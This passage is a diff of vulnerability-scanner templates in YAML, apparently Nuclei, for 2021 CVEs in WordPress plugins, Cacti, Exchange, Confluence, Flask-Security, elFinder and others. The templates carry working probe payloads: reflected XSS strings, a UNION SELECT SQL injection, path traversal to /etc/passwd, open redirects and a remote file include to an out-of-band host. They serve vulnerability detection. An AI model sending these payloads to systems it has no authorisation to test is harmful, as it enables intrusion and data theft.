+          - "d161b6e25db66456f8e0603de5132d1ff90f9388d0a0305d2d073a67fd229ddb"
+          - "d56f0577fbbbd6f159e9be00b274270cb25b60a7809871a6a572783b533f5a3c"
+          - "d812b9bf6957fafe35951054b9efc5be6b10c204c127aa5a048506218c34e40f"
+          - "dc6b3e9c0fad345e7c45a569f4c34c3e94730c33743ae8ca055aa6669ad6ac56"
+          - "def1880ada798c68ee010ba2193f53a2c65a8981871a634ae7e18ccdcd503fa3"
+          - "e2578590390a9eb10cd65d130e36503fccb40b3921c65c160bb06943b2e3751a"
+          - "e4b6f040fe2e04c86ed1f969fc72710a844fe30c3501b868cb519d98d1fe3fd0"
+          - "eb078ffe61726e3898dc9d01ea7955809778bde5be3677d907cbd3b48854e687"
+          - "ec9dfedd7bd44754668b208858a31b83489d5474f7606294f6cc0128bb218c6d"
+          - "ed4780bb05c30e3c145419d06ad0ab3f48bd3004a90fb99601f40c5b6e1d90fd"
+          - "ef53a4f4523a4a0499fb892d9fb5ddb89318538fef33a74ce0bf54d25777ea83"
+          - "f154ef27cf0f1383ba4ca59531058312b44c84d40938bc8758827023db472812"
+          - "f7d1309f3caef67cb63bd114c85e73b323a97d145ceca7d6ef3c1c010078c649"
+          - "f9ab217549b223c55fa310f2007a8f5685f9596c579f5c5526e7dcb204ba0e11"
+        condition: or
 
     extractors:
       - type: regex
-        name: csrf-token
-        internal: true
         group: 1
         regex:
-          - 'csrf-token" content="(.*?)" />\n\n<meta'
+          - '(?:application-)(\S{64})(?:\.css)'
-
-      - type: regex
-        name: whoami
-        part: interactsh_request
-        group: 1
-        regex:
-          - '([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z]+)'

cves/2021/CVE-2021-24300.yaml

@@ -0,0 +1,49 @@
+id: CVE-2021-24300
+
+info:
+  name: PickPlugins Product Slider for WooCommerce < 1.13.22 - XSS
+  author: cckuailong
+  severity: medium
+  description: The slider import search feature of the PickPlugins Product Slider for WooCommerce WordPress plugin before 1.13.22 did not properly sanitised the keyword GET parameter, leading to reflected Cross-Site Scripting issue.
+  reference:
+    - https://wpscan.com/vulnerability/5fbbc7ad-3f1a-48a1-b2eb-e57f153eb837
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-24300
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2021-24300
+    cwe-id: CWE-79
+  tags: cve,cve2021,xss,wp,wordpress,wp-plugin,authenticated
+
+requests:
+  - raw:
+      - |
+        POST /wp-login.php HTTP/1.1
+        Host: {{Hostname}}
+        Origin: {{RootURL}}
+        Content-Type: application/x-www-form-urlencoded
+        Cookie: wordpress_test_cookie=WP%20Cookie%20check
+
+        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
+      - |
+        GET /wp-admin/edit.php?post_type=wcps&page=import_layouts&keyword="onmouseover%3Dalert%28document.domain%29%3B%2F%2F HTTP/1.1
+        Host: {{Hostname}}
+
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'value="\"onmouseover=alert(document.domain);//">'
+          - "PickPlugins Product Slider"
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200

cves/2021/CVE-2021-24488.yaml

@@ -0,0 +1,45 @@
+id: CVE-2021-24488
+
+info:
+  name: WordPress Plugin Post Grid < 2.1.8 - XSS
+  author: cckuailong
+  severity: medium
+  description: The slider import search feature and tab parameter of the Post Grid WordPress plugin before 2.1.8 settings are not properly sanitised before being output back in the pages, leading to Reflected Cross-Site Scripting issues
+  reference:
+    - https://wpscan.com/vulnerability/1fc0aace-ba85-4939-9007-d150960add4a
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-24488
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2021-24488
+    cwe-id: CWE-79
+  tags: cve,cve2021,xss,wp,wordpress,wp-plugin,authenticated
+
+requests:
+  - raw:
+      - |
+        POST /wp-login.php HTTP/1.1
+        Host: {{Hostname}}
+        Origin: {{RootURL}}
+        Content-Type: application/x-www-form-urlencoded
+        Cookie: wordpress_test_cookie=WP%20Cookie%20check
+
+        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
+
+      - |
+        GET /wp-admin/edit.php?post_type=post_grid&page=import_layouts&keyword="onmouseover=alert(document.domain)// HTTP/1.1
+        Host: {{Hostname}}
+
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'value="\"onmouseover=alert(document.domain)/">'
+          - 'Post Grid'
+        condition: and
+
+      - type: status
+        status:
+          - 200

cves/2021/CVE-2021-24510.yaml

@@ -0,0 +1,48 @@
+id: CVE-2021-24510
+
+info:
+  name: MF Gig Calendar <= 1.1 - Reflected Cross-Site Scripting (XSS)
+  author: dhiyaneshDK
+  severity: medium
+  description: The MF Gig Calendar WordPress plugin through 1.1 does not sanitise or escape the id GET parameter before outputting back in the admin dashboard when editing an Event, leading to a reflected Cross-Site Scripting issue
+  reference:
+    - https://wpscan.com/vulnerability/715721b0-13a1-413a-864d-2380f38ecd39
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-24510
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.10
+    cve-id: CVE-2021-24510
+    cwe-id: CWE-79
+  tags: wordpress,cve,cve2021,wp-plugin,authenticated
+
+requests:
+  - raw:
+      - |
+        POST /wp-login.php HTTP/1.1
+        Host: {{Hostname}}
+        Origin: {{RootURL}}
+        Content-Type: application/x-www-form-urlencoded
+        Cookie: wordpress_test_cookie=WP%20Cookie%20check
+
+        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
+
+      - |
+        GET /wp-admin/admin.php?page=mf_gig_calendar&action=edit&id="></script><script>alert(document.domain)</script><" HTTP/1.1
+        Host: {{Hostname}}
+
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '</script><script>alert(document.domain)</script>'
+
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        part: header
+        words:
+          - "text/html"

cves/2021/CVE-2021-24750.yaml

@@ -0,0 +1,43 @@
+id: CVE-2021-24750
+
+info:
+  name: WP Visitor Statistics (Real Time Traffic) WordPress plugin before 4.8 SQLI
+  author: cckuakilong
+  severity: high
+  description: The WP Visitor Statistics (Real Time Traffic) WordPress plugin before 4.8 does not properly sanitise and escape the refUrl in the refDetails AJAX action, available to any authenticated user, which could allow users with a role as low as subscriber to perform SQL injection attacks.
+  reference:
+    - https://github.com/fimtow/CVE-2021-24750/blob/master/exploit.py
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-24750
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 8.8
+    cve-id: CVE-2021-24750
+    cwe-id: CWE-89
+  tags: cve,cve2021,sqli,wp,wordpress,wp-plugin,authenticated
+
+requests:
+  - raw:
+      - |
+        POST /wp-login.php HTTP/1.1
+        Host: {{Hostname}}
+        Origin: {{RootURL}}
+        Content-Type: application/x-www-form-urlencoded
+        Cookie: wordpress_test_cookie=WP%20Cookie%20check
+
+        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
+
+      - |
+        GET /wp-admin/admin-ajax.php?action=refDetails&requests=%7B%22refUrl%22:%22'%20union%20select%201,1,md5('CVE-2021-24750'),4--%20%22%7D HTTP/1.1
+        Host: {{Hostname}}
+
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "266f89556d2b38ff067b580fb305c522"
+
+      - type: status
+        status:
+          - 200

cves/2021/CVE-2021-24838.yaml

@@ -0,0 +1,32 @@
+id: CVE-2021-24838
+
+info:
+  name: AnyComment <= 0.2.21 - Open Redirect
+  author: noobexploiter
+  severity: medium
+  description: The plugin has an API endpoint which passes user input via the redirect parameter to the wp_redirect() function without being validated first, leading to an Open Redirect issue, which according to the vendor, is a feature.
+  reference:
+    - https://wpscan.com/vulnerability/562e81ad-7422-4437-a5b4-fcab9379db82
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-24838
+  tags: wordpress,wp-plugin,open-redirect
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.10
+    cve-id: CVE-2021-24838
+    cwe-id: CWE-601
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-json/anycomment/v1/auth/wordpress?redirect=https://example.com"
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        part: header
+        regex:
+          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
+
+      - type: status
+        status:
+          - 302

cves/2021/CVE-2021-24926.yaml

@@ -0,0 +1,43 @@
+id: CVE-2021-24926
+
+info:
+  name: WordPress Plugin Domain Check < 1.0.17 - XSS
+  author: cckuailong
+  severity: medium
+  description: The Domain Check WordPress plugin before 1.0.17 does not sanitise and escape the domain parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting issue.
+  reference:
+    - https://wpscan.com/vulnerability/8cc7cbbd-f74f-4f30-9483-573641fea733
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-24926
+  classification:
+    cve-id: CVE-2021-24926
+    cwe-id: CWE-79
+  tags: cve,cve2021,xss,wp,wordpress,wp-plugin,authenticated
+
+requests:
+  - raw:
+      - |
+        POST /wp-login.php HTTP/1.1
+        Host: {{Hostname}}
+        Origin: {{RootURL}}
+        Content-Type: application/x-www-form-urlencoded
+        Cookie: wordpress_test_cookie=WP%20Cookie%20check
+
+        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
+
+      - |
+        GET /wp-admin/admin.php?page=domain-check-profile&domain=test.foo<script>alert(document.domain)</script> HTTP/1.1
+        Host: {{Hostname}}
+
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "<script>alert(document.domain)</script>"
+          - "Domain Check"
+        condition: and
+
+      - type: status
+        status:
+          - 200

cves/2021/CVE-2021-24947.yaml

@@ -0,0 +1,39 @@
+id: CVE-2021-24947
+
+info:
+  name: RVM - Responsive Vector Maps < 6.4.2 - Arbitrary File Read
+  author: cckuailong
+  severity: high
+  description: The plugin does not have proper authorisation, CSRF checks and validation of the rvm_upload_regions_file_path parameter in the rvm_import_regions AJAX action, allowing any authenticated user, such as subscriber, to read arbitrary files on the web server.
+  reference:
+    - https://wpscan.com/vulnerability/c6bb12b1-6961-40bd-9110-edfa9ee41a18
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-24947
+  classification:
+    cve-id: CVE-2021-24947
+    cwe-id: CWE-23
+  tags: cve,cve2021,lfi,wp,wordpress,wp-plugin,authenticated,lfr
+
+requests:
+  - raw:
+      - |
+        POST /wp-login.php HTTP/1.1
+        Host: {{Hostname}}
+        Origin: {{RootURL}}
+        Content-Type: application/x-www-form-urlencoded
+        Cookie: wordpress_test_cookie=WP%20Cookie%20check
+
+        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
+      - |
+        GET /wp-admin/admin-ajax.php?action=rvm_import_regions&nonce=5&rvm_mbe_post_id=1&rvm_upload_regions_file_path=/etc/passwd HTTP/1.1
+        Host: {{Hostname}}
+
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: regex
+        regex:
+          - "root:[x*]:0:0"
+
+      - type: status
+        status:
+          - 200

cves/2021/CVE-2021-24991.yaml

@@ -0,0 +1,45 @@
+id: CVE-2021-24991
+
+info:
+  name: The WooCommerce PDF Invoices & Packing Slips WordPress plugin < 2.10.5 - XSS
+  author: cckuailong
+  severity: medium
+  description: The WooCommerce PDF Invoices & Packing Slips WordPress plugin before 2.10.5 does not escape the tab and section parameters before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting in the admin dashboard.
+  reference:
+    - https://wpscan.com/vulnerability/88e706df-ae03-4665-94a3-db226e1f31a9
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-24991
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 4.8
+    cve-id: CVE-2021-24991
+    cwe-id: CWE-79
+  tags: cve,cve2021,xss,wp,wordpress,wp-plugin,authenticated
+
+requests:
+  - raw:
+      - |
+        POST /wp-login.php HTTP/1.1
+        Host: {{Hostname}}
+        Origin: {{RootURL}}
+        Content-Type: application/x-www-form-urlencoded
+        Cookie: wordpress_test_cookie=WP%20Cookie%20check
+
+        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
+
+      - |
+        GET /wp-admin/admin.php?page=wpo_wcpdf_options_page&section=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29+x%3D HTTP/1.1
+        Host: {{Hostname}}
+
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "\" style=animation-name:rotation onanimationstart=alert(document.domain) x"
+          - "WooCommerce PDF Invoices"
+        condition: and
+
+      - type: status
+        status:
+          - 200

cves/2021/CVE-2021-25008.yaml

@@ -0,0 +1,44 @@
+id: CVE-2021-25008
+
+info:
+  name: The Code Snippets WordPress plugin < 2.14.3 - XSS
+  author: cckuailong
+  severity: medium
+  description: The Code Snippets WordPress plugin before 2.14.3 does not escape the snippets-safe-mode parameter before outputting it back in attributes, leading to a Reflected Cross-Site Scripting issue.
+  reference:
+    - https://wpscan.com/vulnerability/cb232354-f74d-48bb-b437-7bdddd1df42a
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-25008
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2021-25008
+    cwe-id: CWE-79
+  tags: cve,cve2021,xss,wp,wordpress,wp-plugin,authenticated
+
+requests:
+  - raw:
+      - |
+        POST /wp-login.php HTTP/1.1
+        Host: {{Hostname}}
+        Origin: {{RootURL}}
+        Content-Type: application/x-www-form-urlencoded
+        Cookie: wordpress_test_cookie=WP%20Cookie%20check
+
+        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
+      - |
+        GET /wp-admin/admin.php?page=snippets&snippets-safe-mode%5B0%5D=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29+x%3D HTTP/1.1
+        Host: {{Hostname}}
+
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "\" style=animation-name:rotation onanimationstart=alert(document.domain) x"
+          - "Snippets"
+        condition: and
+
+      - type: status
+        status:
+          - 200

cves/2021/CVE-2021-25052.yaml

@@ -0,0 +1,44 @@
+id: CVE-2021-25052
+
+info:
+  name: The Button Generator WordPress plugin < 2.3.3 - RFI
+  author: cckuailong
+  severity: high
+  description: The Button Generator WordPress plugin before 2.3.3 within the wow-company admin menu page allows to include() arbitrary file with PHP extension (as well as with data:// or http:// protocols), thus leading to CSRF RCE.
+  reference:
+    - https://wpscan.com/vulnerability/a01844a0-0c43-4d96-b738-57fe5bfbd67a
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-25052
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
+    cvss-score: 8.8
+    cve-id: CVE-2021-25052
+    cwe-id: CWE-352
+  tags: cve,cve2021,rfi,wp,wordpress,wp-plugin,authenticated
+
+requests:
+  - raw:
+      - |
+        POST /wp-login.php HTTP/1.1
+        Host: {{Hostname}}
+        Origin: {{RootURL}}
+        Content-Type: application/x-www-form-urlencoded
+        Cookie: wordpress_test_cookie=WP%20Cookie%20check
+
+        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
+
+      - |
+        GET /wp-admin/admin.php?page=wow-company&tab=http://{{interactsh-url}}/ HTTP/1.1
+        Host: {{Hostname}}
+
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        part: interactsh_protocol
+        name: http
+        words:
+          - "http"

cves/2021/CVE-2021-25864.yaml

@@ -0,0 +1,34 @@
+id: CVE-2021-25864
+
+info:
+  name: Hue Magic - Directory Traversal
+  author: 0x_Akoko
+  severity: high
+  description: node-red-contrib-huemagic 3.0.0 is affected by hue/assets/..%2F Directory Traversal.in the res.sendFile API, used in file hue-magic.js, to fetch an arbitrary file.
+  reference:
+    - https://github.com/Foddy/node-red-contrib-huemagic/issues/217
+    - https://www.cvedetails.com/cve/CVE-2021-25864
+  metadata:
+    shodan-query: title:"NODE-RED"
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2021-25864
+    cwe-id: CWE-22
+  tags: cve,cve2021,huemagic,lfi
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/hue/assets/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2fpasswd"
+
+    matchers-condition: and
+    matchers:
+
+      - type: regex
+        regex:
+          - "root:.*:0:0"
+
+      - type: status
+        status:
+          - 200

cves/2021/CVE-2021-26084.yaml

@@ -4,7 +4,7 @@ info:
   author: dhiyaneshDk,philippedelteil
   severity: critical
   name: Confluence Server OGNL injection - RCE
-  description: In affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an authenticated user, and in some instances an unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance. The vulnerable endpoints can be accessed by a non-administrator user or unauthenticated user if ‘Allow people to sign up to create their account’ is enabled. To check whether this is enabled go to COG > User Management > User Signup Options. The affected versions are before version 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5.
+  description: In affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an authenticated user, and in some instances an unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance. The vulnerable endpoints can be accessed by a non-administrator user or unauthenticated user if 'Allow people to sign up to create their account' is enabled. To check whether this is enabled go to COG > User Management > User Signup Options. The affected versions are before version 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5.
   tags: cve,cve2021,rce,confluence,injection,ognl
   reference:
     - https://jira.atlassian.com/browse/CONFSERVER-67940

cves/2021/CVE-2021-26247.yaml

@@ -0,0 +1,35 @@
+id: CVE-2021-26247
+
+info:
+  name: Unauthenticated XSS Cacti - auth_changepassword.php
+  author: dhiyaneshDK
+  severity: medium
+  description: As an unauthenticated remote user, visit "http://<CACTI_SERVER>/auth_changepassword.php?ref=<script>alert(1)</script>" to successfully execute the JavaScript payload present in the "ref" URL parameter.
+  reference: https://nvd.nist.gov/vuln/detail/CVE-2021-26247
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.10
+    cve-id: CVE-2021-26247
+    cwe-id: CWE-79
+  tags: cve,cve2021,cacti,xss
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/auth_changepassword.php?ref=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"></script><script>alert(document.domain)</script>'
+
+      - type: word
+        part: header
+        words:
+          - "text/html"
+
+      - type: status
+        status:
+          - 200

cves/2021/CVE-2021-26855.yaml

@@ -1,13 +1,14 @@
 id: CVE-2021-26855
 
 info:
-  name: Exchange Server SSRF Vulnerability
+  name: Microsoft Exchange Server SSRF Vulnerability
   author: madrobot
   severity: critical
-  description: |
+  description: This vulnerability is part of an attack chain that could allow remote code execution on Microsoft Exchange Server. The initial attack requires the ability to make an untrusted connection to Exchange server port 443. Other portions of the chain can be triggered if an attacker already has access or can convince an administrator to open a malicious file. Be aware his CVE ID is unique from CVE-2021-26412, CVE-2021-26854, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065, and CVE-2021-27078.
-    Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-26412, CVE-2021-26854, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065, CVE-2021-27078.
+  remediation: Apply the appropriate security update.
   tags: cve,cve2021,ssrf,rce,exchange,oast,microsoft
   reference:
+    - https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26855
     - https://proxylogon.com/#timeline
     - https://raw.githubusercontent.com/microsoft/CSS-Exchange/main/Security/http-vuln-cve2021-26855.nse
     - https://www.shodan.io/search?query=vuln%3ACVE-2021-26855
@@ -28,4 +29,5 @@ requests:
       - type: word
         part: interactsh_protocol # Confirms the HTTP Interaction
         words:
-          - "http"
+          - "http"
+# Enhanced by mp on 2022/02/04

cves/2021/CVE-2021-29156.yaml

@@ -1,12 +1,17 @@
 id: CVE-2021-29156
 
 info:
-  name: LDAP Injection In Openam
+  name: LDAP Injection In OpenAM
   author: melbadry9,xelkomy
   severity: high
   tags: cve,cve2021,openam,ldap,injection
-  description: The vulnerability was found in the password reset feature that OpenAM provides. When a user tries to reset his password, he is asked to enter his username then the backend validates whether the user exists or not through an LDAP query before the password reset token is sent to the user’s email.
+  description: OpenAM contains an LDAP injection vulnerability. When a user tries to reset his password, they are asked to enter username, and then the backend validates whether the user exists or not through an LDAP query. If the user exists, the password reset token is sent to the user's email. Enumeration can allow for full password retrieval.
-  reference: https://blog.cybercastle.io/ldap-injection-in-openam/
+  remediation: Upgrade to OpenAM commercial version 13.5.1 or later.
+  reference:
+    https://github.com/sullo/advisory-archives/blob/master/Forgerock_OpenAM_LDAP_injection.md
+    https://hackerone.com/reports/1278050
+    https://www.guidepointsecurity.com/blog/ldap-injection-in-forgerock-openam-exploiting-cve-2021-29156/
+    https://portswigger.net/research/hidden-oauth-attack-vectors
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.50
@@ -24,3 +29,5 @@ requests:
       - type: dsl
         dsl:
           - 'contains(body, "jato.pageSession") && status_code==200'
+
+# Enhanced by cs on 2022/01/24

cves/2021/CVE-2021-32618.yaml

@@ -0,0 +1,28 @@
+id: CVE-2021-32618
+
+info:
+  name: Flask Open Redirect
+  author: 0x_Akoko
+  severity: medium
+  description: There is code in FS to validate that the url specified in the next parameter is either relative OR has the same netloc (network location) as the requesting URL. This check utilizes Pythons urlsplit library. However many browsers are very lenient on the kind of URL they accept and 'fill in the blanks' when presented with a possibly incomplete URL. As a concrete example - setting http://login?next=\\\github.com will pass FS's relative URL check however many browsers will gladly convert this to http://example.com.
+  reference:
+    - https://github.com/Flask-Middleware/flask-security/security/advisories/GHSA-6qmf-fj6m-686c
+    - https://github.com/Flask-Middleware/flask-security/issues/486
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-32618
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.10
+    cve-id: CVE-2021-32618
+    cwe-id: CWE-601
+  tags: cve,cve2021,redirect,flask
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/login?next=\\\example.com'
+
+    matchers:
+      - type: regex
+        part: header
+        regex:
+          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1

cves/2021/CVE-2021-32682.yaml

@@ -0,0 +1,47 @@
+id: CVE-2021-32682
+
+info:
+  name: elFinder - Multiple vulnerabilities leading to RCE
+  author: smaranchand
+  severity: critical
+  tags: cve,cve2021,elfinder,misconfig,rce,oss
+  description: elFinder is an open-source file manager for web, written in JavaScript using jQuery UI. Several vulnerabilities affect elFinder 2.1.58. These vulnerabilities can allow an attacker to execute arbitrary code and commands on the server hosting the elFinder PHP connector, even with minimal configuration. The issues were patched in version 2.1.59. As a workaround, ensure the connector is not exposed without authentication.
+  reference:
+    - https://smaranchand.com.np/2022/01/organization-vendor-application-security/
+    - https://blog.sonarsource.com/elfinder-case-study-of-web-file-manager-vulnerabilities
+    - https://github.com/Studio-42/elFinder/security/advisories/GHSA-wph3-44rj-92pr
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-32682
+  remediation: Update to elFinder 2.1.59
+  metadata:
+    github: https://github.com/Studio-42/elFinder
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.80
+    cve-id: CVE-2021-32682
+    cwe-id: CWE-22,CWE-78,CWE-918
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/admin/elfinder/elfinder-cke.html"
+      - "{{BaseURL}}/assets/backend/elfinder/elfinder-cke.html"
+      - "{{BaseURL}}/assets/elFinder-2.1.9/elfinder.html"
+      - "{{BaseURL}}/assets/elFinder/elfinder.html"
+      - "{{BaseURL}}/backend/elfinder/elfinder-cke.html"
+      - "{{BaseURL}}/elfinder/elfinder-cke.html"
+      - "{{BaseURL}}/uploads/assets/backend/elfinder/elfinder-cke.html"
+      - "{{BaseURL}}/uploads/assets/backend/elfinder/elfinder.html"
+      - "{{BaseURL}}/uploads/elfinder/elfinder-cke.html"
+
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "elfinder"
+          - "php/connector"
+        condition: and
+
+      - type: status
+        status:
+          - 200

cves/2021/CVE-2021-32853.yaml

@@ -0,0 +1,36 @@
+id: CVE-2021-32853
+
+info:
+  name: Erxes <= v0.23.0 XSS
+  author: dwisiswant0
+  severity: medium
+  description: Erxes prior to version 0.23.0 is vulnerable to cross-site scripting.The value of topicID parameter is not escaped & triggered in the enclosing script tag.
+  reference:
+    - https://securitylab.github.com/advisories/GHSL-2021-103-erxes/
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-3285
+  metadata:
+    shodan-query: http.title:"erxes"
+  tags: cve,cve2021,xss,erxes,oss
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/widgets/knowledgebase?topicId=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'topic_id: "</script><script>alert(document.domain)</script>'
+          - "window.erxesEnv"
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200

cves/2021/CVE-2021-34640.yaml

@@ -0,0 +1,48 @@
+id: CVE-2021-34640
+
+info:
+  name: Securimage-WP-Fixed <= 3.5.4 - Reflected Cross-Site Scripting (XSS)
+  author: dhiyaneshDK
+  severity: medium
+  description: The Securimage-WP-Fixed WordPress plugin is vulnerable to Reflected Cross-Site Scripting due to the use of $_SERVER['PHP_SELF'] in the ~/securimage-wp.php file which allows attackers to inject arbitrary web scripts, in versions up to and including 3.5.4.
+  reference:
+    - https://wpscan.com/vulnerability/22017067-8675-4884-b976-d7f5a71279d2
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-34640
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.10
+    cve-id: CVE-2021-34640
+    cwe-id: CWE-79
+  tags: wordpress,cve,cve2021,wp-plugin,authenticated
+
+requests:
+  - raw:
+      - |
+        POST /wp-login.php HTTP/1.1
+        Host: {{Hostname}}
+        Origin: {{RootURL}}
+        Content-Type: application/x-www-form-urlencoded
+        Cookie: wordpress_test_cookie=WP%20Cookie%20check
+
+        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
+
+      - |
+        GET //wp-admin/options-general.php/"></script><script>alert(document.domain)</script>/script%3E?page=securimage-wp-options%2F HTTP/1.1
+        Host: {{Hostname}}
+
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '</script><script>alert(document.domain)</script>'
+
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        part: header
+        words:
+          - "text/html"

cves/2021/CVE-2021-34643.yaml

@@ -0,0 +1,48 @@
+id: CVE-2021-34643
+
+info:
+  name: Skaut bazar < 1.3.3 - Reflected Cross-Site Scripting
+  author: dhiyaneshDK
+  severity: medium
+  description: The Skaut bazar WordPress plugin is vulnerable to Reflected Cross-Site Scripting due to the use of $_SERVER['PHP_SELF'] in the ~/skaut-bazar.php file which allows attackers to inject arbitrary web scripts, in versions up to and including 1.3.2.
+  reference:
+    - https://wpscan.com/vulnerability/c1b41276-b8fb-4a5c-bede-84ea62663b7a
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34643
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.10
+    cve-id: CVE-2021-34643
+    cwe-id: CWE-79
+  tags: wordpress,cve,cve2021,wp-plugin,authenticated
+
+requests:
+  - raw:
+      - |
+        POST /wp-login.php HTTP/1.1
+        Host: {{Hostname}}
+        Origin: {{RootURL}}
